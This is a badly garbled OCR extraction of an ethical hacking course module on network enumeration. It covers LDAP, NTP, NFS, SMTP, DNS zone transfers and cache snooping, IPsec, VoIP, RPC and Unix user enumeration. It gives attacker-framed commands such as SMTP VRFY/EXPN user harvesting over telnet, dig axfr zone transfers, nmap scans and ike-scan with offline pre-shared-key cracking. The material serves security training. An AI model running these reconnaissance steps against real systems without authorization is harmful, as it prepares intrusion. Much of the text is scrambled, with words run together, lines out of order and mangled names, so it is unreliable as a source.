extractedvia LDAPenumeration,andLOAPenumeration
tools.
LDAPis a n Internetprotocol
for accessing distributeddirectoryservices. LDAPaccesses directory
toa other is
listings
withinActiveDirectory or from directoryservices. LDAP a hierarchical or logical
formof a directory, similar company’s organizational chart.Directory services mayprovide
any organizedset of records, often in a hierarchicaland logicalstructure, suchas a corporate
DNS lookups
emaildirectory.
and
the
fast of client
It uses
LDAPsessionbyconnecting
for quick
to a Directory System Agent
resolutionqueries.
(DSA), typically
A starts an
on TCPport389,and
an tothe Basic
sends operation
information Rules
request DSA.The
betweenthe clientandserver.
Encoding (BER) formatis usedto transmit
ical andCountermensores
Mackin ©by E-Comel
Copyright
LDAP EnumerationTools
‘eis
etry Eporer(AD
Expr)
LDAPEnumerationTools
Thereare manyLDAPenumeration toolsthat accessthe directory
listings
withinActiveDirectory
or other directory
services. Byusingthesetools,
attackerscan enumerate informationsuchas
validusernames,addresses, detailsfromdifferent
anddepartmental LDAPservers,
=
SofterraLDAP
Administrator
Source:https://www.ldapadministrator.com
Softerra
LDAPAdministrator
is an LDAPadministration
toolthatworkswith LDAPservers
suchas ActiveDirectory,
NovellDirectory Services,
andNetscape/iPlanet. It browsesand
managesLDAPdirectories.As shown i n the screenshot, attackers use SofterraLDAP
Administratorto enumerate user detailssuchas first name, last name, emailaddress,
designation,officelocation,
andtelephone number.
ical andCountermensores
Mackin ©by E-Comel
Copyright
+
+
Jarat
are
LDAPAccountManager
tools:
Thefollowingsome additionalLDAPenumeration
=
LDAPAdminTool(hetps://www.ldapsoft.com)
(https://www.ldap-account-manager.org)
(https://securityxploded.com)
LDAPSearch
IXplorer
(http://www.jxplorer.org)
ActiveDirectory (AD
Explorer (https://docs.microsoft.com)
Explorer)
ical
Mackin
and ©by
CountermensoresCopyright
E-Comel
ModuleFlow
[NetBIOS
Enumeration SMTP
and
DNS Enameration
LDAPEnumeration
NTPand NFSEnumeration
Administrators oftenoverlookthe NetworkTime Protocol(NTP) server when considering
security.However,if queried properly,
it can provide
valuablenetworkinformationto an
attacker.Therefore, to knowwhat information
it is necessary an attackercan obtain abouta
networkthrough NTPenumeration. TheNetworkFileSystem (NFS) is usedfor the management
of remote fileaccess.NFSenumeration helps to gather
attackers information suchas a listof
clientsconnectedto the NFSserver, along
with theirIPaddresses,
andexported directories.
Thissection describes
NTPenumeration commands,
tools.
the
NTPenumeration,informationextractedvia NTPenumeration, various
NTPenumeration tools,and NFSenumeration techniques and
ical andCountermensores
Mackin ©by E-Comel
Copyright
NTPEnumeration
Network
TimeProtocol
(NTP)is designed
tosynehronie
| AtackersquerytheNTP
server
to
Ieses UDP
por 12328s primarymeans of the em name,
(0/100second) to
NTPcan maintaintime within10miliseconds
over the publiInternet
unde
achieve
Incan accuracies of200 microseconds
or betes
Inocalarea networks ial condtions
NTP Enumeration
NTPis designed to synchronize
clocksof networkedcomputers. It uses UDPport 123 as its
primary
means ofcommunication.
Internet. Furthermore,
conditions.
NTPcan time
maintain
within
an msover
error of10 the public
it can achievean accuracyof 200 ps or better i n LANsunderideal
Thefollowing
are some piecesofinformation
an attacker
can obtainbyqueryingan NTPserver:
=
Listof hostsconnectedto the NTPserver
= i n the network,
ClientsIPaddresses their system
names,andOSs
‘+
Internal
IPs,server
demilitarized
(DMZ)
if the NTP is i n the zone
ical andCountermensores
Mackin ©by E-Comel
Copyright
NTP EnumerationCommands
NTP EnumerationCommands
NTPenumeration commands suchasntpdate, ntptrace, ntpde,andntpq are usedto queryan
NTPserver for valuableinformation
=
ntpdate
Thiscommand collectsthe numberof time samples
fromseveraltime sources.Its syntax
is as follows:
authentication
Forcethe time to
function/specify
Enabletheauthentication
beslewed
always
the key
to
identifier be usedfor
“keyfile";
the path the
an
fleasthestring thedefault
is /ete/ntp/keys
Version
NTP
Specify
the
| 1or2;the integer
version,
versionfor outgoing
defaultis 4
packets
as an whichcan be
Module
8 27
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
TP samples of 4
Specify
| Query
from
thenumber samples
1-8;
ranging
to beacquired
thedefaults
fromeachserver,withvalues
only;
not
Divertlogging
do settheclock
outputfromthestandardoutput(default syslog
to the system
facility
Specify
for
the maximum wait time a
Usean unprivileged
server
portfor outgoing
response;
1s
packets
thedefaults
Beverbose; logsntpdate’s
version identification
string,
Table
4.4;tpdateparametersan
thelr functions
respective
ntptrace
debugging
Figure4.2:Screenshotof the ntpdate
command,showing information
for a given
isafollows:
s
to the network.Its
command to trace
Module
8 28
Page
and ©ical Mackin Countermensores
Copyright
by E-Comel
Example:
# ntptrace
localhost: stratum 4, offset 0.0019529, synchdistance 0.143235
10.10.0.1: stratum 2, offset 0.01142
73, synchdistance 0.115554
10.10.1.1: stratum 1, offset 0.0017698, synchdistance 0.011193
ntpde
Thiscommand queriesthe ntpddaemonabout its current state andrequests in
that state, Attackersuse thiscommandto retrieve the state and statistics of eachNTP
server connected to the targetnetwork.Itssyntax
i s as follows:
changes
ntpde [-ilnps] [-c command][hostname/IP_address]
Following
-
argumentinterpreted
be given
as an multipleoptionsmay
interactiveformatcommand;
(Obtain
alist
Output
toc
of peersknownto the server(s);
i n thedotted-quad
allhostaddresses
thisswitch
is equivalent listpeers|
numeric format,ratherthanhostnames
Printpeers
well
summary
of
their
alistof the as
their slightly
as a
46:parameters
and
their
respective mde functions
te obtainaddtionalNTPserver
Information
Figure4.13:
Screenshot
of the ntpde
command
8
Module 129
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
=
ntpq
Thiscommandmonitors the operationsof the NTPdaemonntpd and determines
performance.
Its syntaxis as follows:
ntpq [-inp] [-c command][host/IP_address]
Following command;
Debugging
mode
-c isan interactive format
argument multipleoptionsmaybegiven
Example:
ntpq> version
ntpq 4.2.8p1001.3728-0
ntpg> host,
current host is localhost
ntpgqueries
‘These can be
usedto obtainadditional
NTP
server
information
Figure424:Sereenshotof ntpacommand
Module
8 £20
Page tical andCountermensores
Making Copyright©
by Comet
NTPEnumerationTools
{©PRTG
Network
Monitorincludes
SNTP
S ensor
monitor,a simplenetwork
te protcol(SNTP)
sew
NTP
Nmap
Enumeration
Tools
thtos//nmop
oa)
Wiresharkhtas//monwireshork
og
Uittps
ets
de protoscanner
prtealsco.o8)
(hep byefsioncom)
NTP EnumerationTools
NTPenumeration toolsare usedto monitor the working
of NTPandSNTPservers i n the network
andhelpi n the configuration
andverification of connectivity
fromthe time client to the NTP
servers.
=
PRTGNetworkMonitor
Source:https://www.paessler.com
monitors all systems,
PRTG andapplications
traffic,
devices, of IT infrastructure
byusing
technologies
various suchas SNMP,WMI,andSSH.
shownin the screenshot,
‘As attackersuse PRTGNetworkMonitor to retrieve SNTPserver
detailssuchas the responsetime fromthe server, active sensorswith the server, and
synchronization
time.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Response
Time Oterence
28msec
415:Screenshot
Figure ofPATENetwork
Monitor
Thefollowing
are some NTPenumeration tools:
+
(https://nmap.org)
Nmap
©
(https://www.wireshark.org)
Wireshark
=
(https://labs.portcullis.co.uk)
udp-proto-scanner
(http://www.bytefusion.com)
NTPServerScanner
Module
Page 8 22
tical
Making
and by CountermensoresCopyright©
Comet
NFSEnumeration
TheNES on the
generalimplemented
s ystems
ie required
fr ctal
resources
theNFS hee
carver alongwith ‘and
NFSEnumeration
NFSis a typeof file system that enablesusers to access,view, store,and update files over a
remote server. These remote datacan beaccessed bythe clienti n thesame wayitis accessed
cn
thesystem.
or Depending
onprivileges
local
assigned
the
clients,
either
bothreadandwrite thedataonly the to theycan read
An NFSsystemis generally
implemented networkin whichthe centralization
on a computer of
data is required
for criticalresources. Theremote procedure
call (RPC)
is usedto route and
process
To
therequestbetween
accomplish
clientsandservers.
thetaskof sharing filesanddirectoriesover the network,the “exporting―
process
is used.However, the clientfirst attemptsto makethe file availablefor sharing byusingthe
“mounting―
process. The /etc/exports location on the NFSserver contains a listof clients
allowedto sharefileson the server. In this approach,to access the server, the onlycredential
used is the client's IP address.NFSversions before version 4 run on the same security
specification.
Enumerating NFSservices enablesattackers to identify
the exporteddirectories,listof clients
connectedto the NFSserver alongwith theirIP addresses,andthe shareddataassociated with
After gathering
the IP addresses. this information,the attackerscan spoof
their IP addresses to
gainfullaccessto the sharedfileson the server.
‘As
intan
he
shown
for an
attacker
open
NFS
portruns
the
(port
IP address following
NFS command
screenshot,
services
on 2049) andthe
xpeinfo
running it:
to scanthe target
zpeinfo ~p 10.10.10.16
8
Module 22
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
vubuntu@ubuntu: ~
100005
100005
nes
BEE
portanden
service rs
running
ont
100005,
180805
nountd
rountd
rountd
rountd
100021
100021 9
nlockngr
nlockngr
nlockrgr
nlockngr
nlockngr
shown thescreenshot,
‘As in
Screenshotof recinfo
Figure4.16;
an attackerruns the
command
open
displaying
following
NFSportand services
8
Module 26
Page ical Mackin
and ©
Countermensores
Copyright
by E-Comel
NFSEnumerationTools CEH
NFSEnumerationTools
NFSenumeration toolsscan a networkwithina given range of IPaddresses
to
identify on
theNFSservicesrunning it. These
Usingportmap,alist of NFSshares,andalist of directoriesaccessible
or
toolsalsoassisti n obtaining
through
asingle
alist
IPaddress
of RPCservices
NFS; further,they
allowdownloading through
a file shared the NFSserver. Attackers usetoolssuch asRPCScan and
=
to
SuperEnum perform
RPCScan
NFSenumeration.
Source:https://aithub.com
RPCScan communicateswith RPC misconfigurations
services andchecks on NFSshares.
ical andCountermensores
Mackin ©by E-Comel
Copyright
File Edit Vi search Terminal Help
@parrot
#python3rpc-scan.py 10.10.10.19 --rpc
rpc://10.10.10.19:111 Portmapper
for
npc services
lportmapper (100000)
lportmapper (100000)
10.10.10.19
udp
udp
1
ul
lportmapper
(100000) udp
lportmapper
tep
(100000)
lportmapper(100000) tep
in
1
1
demon
demon
tep (100005)
(100005)
tcp
tep
2049
2049
2049
(100005)
demon
demon
demon
(100005)
(100005)
tep
udp
2049
2049
049
(100005) 2049
2049
lock
network
Inetwork
lock
mana
manager
lock
Inetwork manage:
Figure
418:
Screenshot
of
RPCScan
displaying
open
NFS
ports
and
serie
Module
Page
8 26
tical
Making
and CopyrightÂ
by
Comet
Countermensores
=
SuperEnum
Source:https://github.com
SuperEnum includesa scriptthat performsthe basicenumeration of any open port.As
shown an
attacker
uses
the script a
i n the screenshot,
text file name “Target.
‘enumeration.
txt― havinga target
./superenum andthenenters
IP addressor a list of IP addresses
for
~
#7superenum]
Running
script
[rar
cet.
txt] Filecontaining
targetIP address
4.19: runing
Figure
sri
Screenshotof SuperEnum
the scriptdisplays
After scanninga targetIP address, all the open ports,as showni n the
belowscreenshot. Port2049hasan NFSservice running,
Figure
4.20:
of displaying
port
Screenshot SuperEnum openNFS
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
[NetBIOS
Enumeration SMTP
and
DNS Enameration
LDAPEnumeration
SMTPand DNSEnumeration
This section describes enumeration techniquesto extract information relatedto network
resources. It also covers DNSenumeration techniques that yieldinformationabout the DNS
servers andnetworkinfrastructure ofthetargetorganization.
Thesection discussesbothSMTP
covering
SMTP process
andDNSenumerationtechniques,
alist
of
enumeratio
enumeration,the
validuserson an SMTPserver, SMTPenumeration tools,DNSzone transfer
of obtaining
DNS
andwalking,
cachesnooping, DNSzone
ical andCountermensores
Mackin ©by E-Comel
Copyright
SMTPEnumeration
SMTPEnumeration
Mail systemscommonly use SMTPwith POP3 andIMAP, whichenableusers to save messagesi n
the server mailboxanddownloadthemfromthe server whennecessary. SMTPuses mail
exchange (MX)servers to directmailvia DNS.It runs on TCPport25,2525,or $87,
the following
SMTPprovides threebuilt-incommands.
*
VRFY:Validatesusers
$ telnet 192.168.168.1 25
192,168,168.1
‘Trying
Connected to 192.168.168.1
Escapecharacter is '*]'
220 Wymaileerver ESMIP Sendmail 8.9.3
HELO
501 HELO requires domain address
HELO x
250 NYmailserver Hello [10.0.0.86], pleasedto meet you
VRFY Jonathan
250 Super-User <Jonathan@NYmailserver>
VREY smith
550 Smith... User unknown
ical andCountermensores
Mackin ©by E-Comel
Copyright
$ telnet the
EXPN:Displaysactual
delivery
addresses
192.168.168.1 25 ofaliases
mailing
listsand
‘Trying
192.168.168.1.
Connected to 192.168.168.1
Escapecharacter is
'*
HELO
501 HELO requires domain address
HELO x
250 NYmailserver Hello [10.0.0.86], pleased to meet you
EXPN Jonathan
280 Super-User <JonathantNYmailserver>
EXPN smith
550 Smith... User unknown
TO:
RCPT Definesthe recipients
$ telneti 192.168.168.1 25
of themessage
eying 192.168,168.1
Connected to 192.168.168.1
Escapecharacter is '*]'
220 Wymaileerver ESMIP Sendmail 8.9.3
HELO
501 HELO requires domain address
HELO x
250 NYmailserver Hello [10.0.0.86], pleasedto meet you
MAIL FROM:Jonathan
250 Jonathan... Sender ok
RCP? TO:Ryder
250 Ryder... Recipient ok
RCP?TO: Smith
550 smith... User unknown
SMTPservers respond differentlyto VRFY,
EXPN, andRCPT TOcommands forvalidandinvalid
users;therefore, valid users on the SMTPserver can be determined.Attackerscan directly
Administrators
a of
interact with SMTPvia theTelnetpromptandcollect list valid users on the SMTPserver.
and pen testers can perform SMTPenumeration usingcommand-lineutilities
suchas Telnetand netcat or byusing toolssuchas Metasploit,
Nmap,NetScanToolsPro,and
smtp-user-enum
a
to collect listofvalidusers,delivery
addresses,
message recipients,
etc.
8
Module £40
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
1
SMTP
Enumeration Tools CEH
SMTPEnumerationTools
SMTPenumeration tools are usedto perform username enumeration. Attackerscan use the
usernames obtainedfromthis enumeration to launchfurther attackson other systems
i n the
network.
=
NetScanTools
Pro
Source:https://www.netscantools.com
Pro'sSMTPEmailGeneratortool tests the processof sending
NetScanTools an email
and an
SMTP
messagethrough
extract
email
parameters,
server.
confirm/urgent
all the
flags.
can
header
Attackersuse NetScanTools
including
Profor SMTPenumeration
Attackers
alsorecordthe emailsessionin a logfile andthen view the communications between
NetScanToolsPro andthe SMP server i n the logfile.
ical andCountermensores
Mackin ©by E-Comel
Copyright
4.21;Sereenshoof NetSeanTaos
Figure Pro
smtp-user-enum,
Source:http://pentestmonkey.net
is a tool for enumerating
smtp-user-enum OS-level
user accountson Solarisvia theSMTP
service
and RCPT
passed
(sendmail).
TOcommands.
is performed
Enumeration byinspectingresponsesVRFY,
As showni n the screenshot, the to
EXPN,
smtp-user-enum needsto be
on to a list of users andat leasto ne targetrunningan SMTPservice. Thesyntax
for usingsmtp-user-enum is as follows:
smtp-user-enum.pl[options] (-u username|-U file-of-usernames) (~
t host|-T file-of-targets)
smtp-user-enum hasthe following options:
n:
-m
ofprocesses
(default:
Maximum number
-M mode:Specify
the SMTPcommandto use
5)
for username guessingfrom among
©
EXPN,
VRFY,
(default:
-wuser:
andRCPT
TO VRFY)
Checkif a user existson the remote system
f addr: Specify
the from emailaddressto use for "RCPTTO" guessing(default:
User@example.com)
ical andCountermensores
Mackin ©by E-Comel
Copyright
-D dom:Specify to the supplied
the domainto append user list to create email
none)
(default:
addresses
U
file:
-thost:
Select
thefile usernames
Specify
via
the
containing to check
the server hostrunningtheSMTPservice
SMTPservice
-Tile:
Select
-p port:
fileport
Specify
the
which
SMTP
theTCP
the
service
runs
(default:
on
running SMTP
hostnames
containing
the
service
25)
-d: Debugging output
stn:
-v:
Wait forreply
(default:
5)
for a maximum of n seconds the
Verbose
ch:Help
message
422;
Figure Screenshotof smtp-user-enum
ical andCountermensores
Mackin ©by E-Comel
Copyright
DNSEnumerationUsing
ZoneTransfer
DNSEnumerationUsing
ZoneTransfer
DNS
zone
transfer
to
server process
secondary
a of
transferring
is
copy
the
DNS
zone a of the file fromthe primaryONS
DNSserver. In most cases,the primaryDNSserver maintains a backup
or
secondary
holds
server for redundancy,
which
changes
all the informationstoredin the primaryserver.
The DNS server uses zone transferto distribute
secondary server(s).
An attackerperforms
made to the main server to the
DNSzone transferenumeration to locatethe ONS
server andaccess records
allowszone transfers,
hostnames,
of
of the targetorganization.
thenattackersc an perform
assigned
If the DNSserver the target
DNSzone transfer
machinenames, usernames, |P addresses, aliases,
organization
to obtainDNSserver names,
etc. within a target
domain.
In DNSenumeration usingzone transfer, an attackerattempts to retrieve a copyof the entire
zone file for a domainfromthe DNSserver. Attackers can perform DNSzone transferusingtools
suchas nslookup, digcommand, andDNSRecon. If the DNStransfersettingis enabledon the
targetname server, it will provide
the DNSinformation; else,
it will return an error stating
it has
failedor refused the zone transfer.
To perform a ONSzone transfer,the attackersendsa zone-transferrequestto the DNSserver
amountof DNS
pretendingto be a client;
the DNSserver thensendsa portionits databaseas a zone to the
attacker.Thiszone may
contain
a large of informationaboutthe zonenetwork.
ical andCountermensores
Mackin ©by E-Comel
Copyright
digCommand
‘Attackers
use the dig command o n Linux-basedsystems to querythe DNSname servers
andretrieveinformation aboutthe targethostaddresses, name servers, mailexchanges,
etc. Asshowni n the screenshot,attackersuse the followingcommandto perform DNS
zone
transfer:
dig ne <target domain>
Theabovecommandretrieves all the DNS name servers of the targetdomain.Next,
attackersuse one of the name servers fromthe output of the abovecommandto test
whetherthe targetDNSallowszone transfers.They use the followingcommandfor this
purpose:
dig @<domainof name server> <target domain> axfr
(fig.
ns
sno.
certi Fredhacker
>
co]
ns ww. certified
opcode:
SHEADER<c- QUERY,status: NOERROR
ra;
‘OPT
ar rd 1, AN
QUERY:
PSEUDOSECTION:
ENS: versi
SECTION
‘QUESTION
TRSWER SECTTON
Forti 21599
i. certifiedhacker.com. 14399 certifiedha
fiedhacker si. blueh«
Fertifiedhacker 21599
Querytine: 325
nsec
SERVER: 6.8.8.6053(8.8.8.6)
WHEN:Tue Nov 05 00:51:35 est 2
MSGSIZE. revd:1 11
‘Pig.
Gnsi.
bluehost
fiedhacker
com
Dig 9,11,5-P4-3-Debian
war corti
<o>
@rsl,blue
+
(1 server found)
global options: snd
Transfer failed
Modul
8 445
Page tical andCountermensores
Making Copyright©
by Comet
nslookupCommand
Source:https://docs.
microsoft.com
‘Attackers
servers
use the nslookup
exchanges,
command
and retrieve information
on Windows-based
aboutthe targethostaddresses,
etc. Asshowni n the screenshot,
systems
toquery
the
DNS
name
name servers, mail
attackersuse the following
commandto
perform
DNSzone transfer:
nslookup
set querytype=soa
<target domain>
Theabovecommand setsthe query typeto theStartof Authority
(SOA)
recordto retrieve
administrativeinformationabout the ONS zone of the target domain
certifiedhacker.com, Thefollowing commandis usedto attemptto transferthe
zone ofthespecified
name server:
(1s ~4 <domain of name server>
Figure
424; ONS
zone
using
the
Screenshotof Windows transfer nslookup command
ical andCountermensores
Mackin ©by E-Comel
Copyright
=
DNSRecon
Source:https://github.com
Attackersuse DNSRecon
to checkall NSrecordsof the targetdomainfor zone transfers.
‘As attackersuse thefollowing
shownin the screenshot, command forDNSzone transfer:
dnsrecon -t axfr -d <target domain>
In the above
command,
the -doptionspecifies
-t
the optionspecifies
thetargetdomain,
the
type
are ato
ofenumerationbe performed,
axfr is thetypeof enumerationi n whichall NSservers testedfor zonetransfer,
and
erver 162.159.25.175
80 Ha:
r Fai
ical andCountermensores
Mackin ©by E-Comel
Copyright
DNSCacheSnooping CEH
DNSCacheSnooping
DNScachesnooping is a typeof DNSenumeration technique i n whichan attackerqueries the
DNSserver for a specific
cached DNSrecord.Byusingthiscached record,the attackercan
determinethe sites recently
visitedbythe user. Thisinformationcan furtherrevealimportant
informationsuchas thename of theowner
ofthe
DNSserver, its service provider,
its vendor,and bankdetails. Byusingthis information,
user. Attackersperform
engineeringattackon the target
the name of
the attackercan perform a social
DNScachesnoopingusingvarious tools
suchas the digcommand, DNSSnoop Dogg,andDNSRecon.
Attackersuse the following
two DNScachesnooping methodsto snoop on a targetdomain,
Non-recursive Method
In thismethod,
the Recursion
fora specific bitA, zero.
DNSrecordsuchasCNAME,
query
to snoopon a DNSserver, attackers
Attackers
Desired(RD) i n the queryheader
PTR,
senda non-recursive
to
CERT, SRV,
bysetting
querythe DNS
andMX. Ifthe queried
cache
record
is presentin the DNS
some user on the system
responds
cache,
DNS
the serverresponds
hasvisited a specific
with the information
withthe informationindicating
domain.Otherwise,
that
the DNS server
aboutanotherDNSserver that can return an answer to
the query, or it replies
with the root .hints file containinginformationaboutall root
DNSservers.
Attackersuse the dig commandfollowedbythe name/lP addressof the ONSserver,
domainname, andtypeof DNSrecord file,The+norecurse optionis usedto set the
query to non-recursive
ical andCountermensores
Mackin ©by E-Comel
Copyright
shownin the screenshot,
‘As the status NOERRORimplies that the querywas accepted
but n o answer was returned,
thereby indicating
that no user fromthe system hadvisited
the
queried
site.
Indicates
thatthequery is
accepted,
butthe
cachedsite
is not
Figure426:
Screenshot
ofa digqueryfora ste thatisnot caches
Recursive
Method
In this method,
to snoop on the DNSserver, attackerssenda recursive query bysetting
the +recurse optioninsteadofthe norecurse
method,
PTR, CERT, SRV, andMX.
to
option.Similar the non-recursive
the attackersquery the DNScachefor a specific DNSrecordsuchas A,CNAME,
Attackersuse the same dig commandas i n the non-recursive methodbut with the
trecurse optioninsteadof thetnorecurse option:
dig @<IP of DNS server> <Target domain> A trecurse
ical andCountermensores
Mackin ©by E-Comel
Copyright
‘As the TTLvaluefor the domaincertifiedhacker.
shownin the screenshot, com is
considerably
thequerywas
low,whichstrongly
issued,
thatthedomain
suggests
was
already
i n thecachewhen
Alow TTLvalue
indicates
cachedqueried
site
Figure
427:Screenshot
ofa digquery
fora
cached
ste
ical andCountermensores
Mackin ©by E-Comel
Copyright
DNSSECZoneWalking
DNSSECZoneWalking
DomainNameSystem
SecurityExtensions (DNSSEC) zone walking is a typeof DNSenumeration
technique
configured.
map.
attacker
i n which
attempts
an
assist @
to obtaininternal
Theenumeratedzone informationcan
recordsif theDNSzone is not properly
the attackeri n buildinghost network
Organizations use DNSSEC to add security featuresto the DNSdata andprovide protection
against
keycryptography uses
digital
knownthreatsto the DNS.Thissecurity
to strengthen
DNSname servers along
feature
authenticationi n DNS.These
with common recordssuchas MX,A,AAAA,
signatures
digital
signatures
andCNAME.
basedon public-
are storedin the
ical andCountermensores
Mackin ©by E-Comel
Copyright
LDNS,
Source:https://www.ninetlabs.n!
LONS-walk
enumerates the DNSSEC
zone andobtainsresults
on the DNSrecordfiles
ubuntu@ubuntu:
ana.org
Japt.tana.org. CNAMERRSIGNSEC
lapp.tana.org. CNAME
RRSIG NSEC
jautodiscover.tana.org.
CNAMERRSIG NSEC
lbtackhote-1.iana.org A RRSIG NSEC
lbtackhote
btackhote
+
ARAARRSIGNSEC
A AAA RRSIG NSEC
Ibtackhote
;
AAAA RRSIGNSt
Jdata.tana.org. CNAMERRSIGNSEC
ldatatracker.tana.org iE RRSIG NSEC
idev.ana.org. CNAMERRSIG NSEC
feedback. tana.org. CNAME
RRSIG NW Enumerated
pata thea
ttar.tana.org.
on
Jnaintenance.tana.org.
A
AAAA
CNAMERRSIG NSEC
Intta-portal.tana.org.
CNAMERRSIG W:
RRSIGNSEC
DNSrecordfile
Figure428; of LONS
Screenshot
displaying
results.o nthe targetd omain
8
Module 452
Page ical
and ©
Mackin Countermensores
Copyright
by E-Comel
DNSRecon
Source:https://www.github.com
DNSRecon
tool
that
assists DNS
is a zone enumeration
aS A,AMAA,andCNAME,
It
filesof a targetdomain.
alsoperforms records
such
users i n enumerating
zone enumeration to obtainDNSrecord
NSEC
Figure4.29
Screenshot displaying
ofDNSRecon resultsonthetarget
domain
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
[NetBIOS
Enumeration
LDAPEnumeration
ical andCountermensores
Mackin ©by E-Comel
Copyright
IPsecEnumeration
ExchargsRE)
‘apne communion
eto
VPen
sear Between
pote
Most Psecbased
‘Associaton
(SAK) a
andKey
part
Internet
Security
VPNsute
Management
Protocol
oFRE,toestab, neat,
Imo, anddeleteSecurityAsooaton SA and
IPsecEnumeration
the most commonly
IPseciis
andhost-to-gateway
employing
implemented
(remote access)
various components
technology
enterprise
for both
gateway-to-gate
(LAN-to-L
VPN solutions.IPsecprovides
suchas Encapsulating SecurityPayload
datasecurity
(ESP),
by
Authentication
Header (AH),andInternet KeyExchange
(IKE) VPNendpoints.
to secure communication between
inaVPN
keys
modify,
negotiate,
environment.
anddeleteSecurity (SA)
Associations and
can perform
‘Attackers simple
direct scanningfor ISAKMPat UDPport500with toolssuchas
to acquireinformationrelatedto the presenceof a VPNgateway.
Nmap
ical andCountermensores
Mackin ©by E-Comel
Copyright
Thefollowing c an be usedto perform
command scanforchecking
an Nmap the statusofISAKMP
over
#
port
500:
nmap -sU -p 500 <target IP address>
Figure4.30:
Screenshot
displaying
an Nmapscan over portS00
fr ISAKMP
Attackerscan probe further using fingerprinting toolssuchas ike-scanto enumerate sensitive
information, including the encryption and hashing algorithm, authenticationtype, key
an ISAKMP of
distributionalgorithm,
header
andSALifeDuration. in thistype scan,specially
are sentto the targetgateway, andthe responses
craftedIKEpackets
are recorded.
with
Thecommand discovery
following
with is usedforinitial IPsec
# ike-scan -M <target gatewayIP address>
VPN ike-scantool
ical andCountermensores
Mackin ©by E-Comel
Copyright
ike-scan
Source:https://github.com
IKEhostsandcan fingerprint
ike-scandiscovers themusing the retransmission backoffpattern.
can perform
ike-scan thefollowing
functions.
Discovery:ThehostsrunningIKEin a givenIPrangecan bedeterminedbydisplaying the
hoststhat respond to the IKErequestssent byike-scan.
Fingerprinting:
TheIKEimplementation usedbythe hostscan be determined, and i n
some cases,the version of thesoftwarethey are runningcan bedetermined.
Thisis done
i n two ways:UDP backofffingerprinting,
whichinvolvesrecording
the times of arrivalof
the IKE responsepackets from the target hosts and comparingthe observed
retransmission backoffpattern knownpatterns,
against and Vendor ID fingerprinting,
whichcomparesVendorID payloads from the VPNservers againstknownVendorID
patterns.
Transformenumeration: Thetransformattributessupportedbythe VPNserver for IKE
1
phase(e.g.,
encryptionalgorithm andhashalgorithm)
Userenumeration: For some VPNsystems,
can bedetermined
validVPNusernames can bediscovered.
Pre-sharedkeycracking: or brute-forcepassword
Offline dictionary crackingcan be
performed for IKEAggressive
Modewith pre-shared keyauthentication.Thisuses ike-
scan to obtainthe hashandother parametersas well as psk-crack,
whichis a partof the
ike-scan package,to perform
the cracking,
ical andCountermensores
Mackin ©by E-Comel
Copyright
VoIPEnumeration
VoIPEnumeration
VolPis an advancedtechnology that hasreplaced the conventionalpublic switchedtelephone
network(PSTN)
and
i n both corporatehomeenvironments. VolP uses internet infrastructure
establishconnectionsfor voice calls;dataare alsotransmittedon the same network.However,
VoIP is vulnerableto TCP/IP
to
ical andCountermensores
Mackin ©by E-Comel
Copyright
© portsforan SIPservice on that hostor multiple
Scanone hoston different hostson
multiple
ports,
>
allthe phones
Ring
Belowscreenshot
on a networksimultaneously
showsa n example
using
the INVITEmethod
fortheenumeration of SIPdevicedetailsusingthe
‘Svmap
tool through
the following
command:
# svmap <target network range>
use Metasploit’s
Attackers SIPUsername
emap
to details
432: Screenshotdisplaying scanforenumerating
Figure SIP
of
Enumerator scan numeric usernames/extensions
VolPphones. showsan example
Belowscreenshot SIPusing Metasploit.
for enumerating
Figure displaying
433:Screenshot exploit
Metasploit fr SIPenumeration
ical andCountermensores
Mackin ©by E-Comel
Copyright
RPCEnumeration
'@
femote
Provedure
atrbuted
Gherferver
protons
ommontatem
CalRC lows dents anderen o
RPCEnumeration
The remote procedure call (RPC)is a technologyusedfor creating distributedclient/server
programs. RPCallowsclientsandservers to communicate i n distributed
client/server
programs.
It is an inter-processcommunication mechanism, which enablesdata exchange between
differentprocesses.In general, RPC consistsof components suchas a client,a server, an
mapper,
endpoint,
clientserver
Theportmapper
stub,
anendpoint
withdependen
a stub,
anda along various
service listenson TCPandUDPport111to detectthe endpoints and present
clients,
details
to identifyRPC
along
services.
with
othersecurity
endpoints
enables
of listening
establishments, thisportmapper
Enumerating RPC
any vulnerableservices on theseservice ports.In networksprotected
is oftenfiltered.Therefore,
attackers
byfirewallsand
attackersscan wide
portrangesto identify RPC services that are open to directattack.
ical andCountermensores
Mackin ©by E-Comel
Copyright
use the following
Attackers Nmap to identify
s can commands the RPCservice runningon the
network:
# nmap ~sR <target IP/network>
# nmap -T4 -A <target IP/network>
[THeseT] pour
Series] Posts Top, Ho D i Sms
oe
eater
c
TT on ener
»
434:
Additionally,
Figure
attackers
Sceenshotdisplaying
usetoolssuch
as NetScanTools
Scan result fr RPCenumeration
an Nmap
ical andCountermensores
Mackin ©by E-Comel
Copyright
File Edt
- Version
demoNetScanTools®
ProDemo
Accesubilty
View IG
Build7-3-2019
Help
bared
on version 1.863
Welcome Click
Buy
Now! hereto Manual RPCnfo.
Toole=“nix
=
cuey
onc
RPC
services
oncompute.
BT
a rx
ManusToot(a)
or v Adtese
TexgetHotname
T.10.10.19
RPCPort
Figure4.35:
Screenshot NetScanTools
displaying Protal for RPC
enumeration
8
Module 462
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
Unix/Linux UserEnumeration
|
Unix/Linux User Enumeration
importantstepsfor enumeration is to perform
One of the Unix/Linux user enumeration
Unix/Linux
host
name, asession,
user enumeration provides
time
each
andstart dateand
listof users along
of
with detailssuchas the username,
following
The utilitiescan beusedto perform
command-line Unix/Linux
user enumeration.
=
rusers
rusers displays
a listof userswho are loggedin to remote machines
or machines
on the
local network. It displaysan output similar to the who command, but for the
hosts/systemson the localnetwork.Its syntax
i s as follows:
fusr/bin/rusers (-a] [-1] [-ul -h] -i] [Host
Theoptions
a re as follows.
© -a: Givesa reportfor a machineeven if no users are logged
in
©
-l: Gives
by
alphabetically
-h:Sorts
alongerhost
name
listing
to
the
who similar command
©
>
-u:
42Sorts
by
idle
time
of
Sortsbythe number users
rwho
who displaysa listof users who are logged
i n to hostso n the localnetwork.Its outputis
to
similar that ofthe whocommandandcontains information aboutthe username, host
name, and start date and time of eachsession for all machines
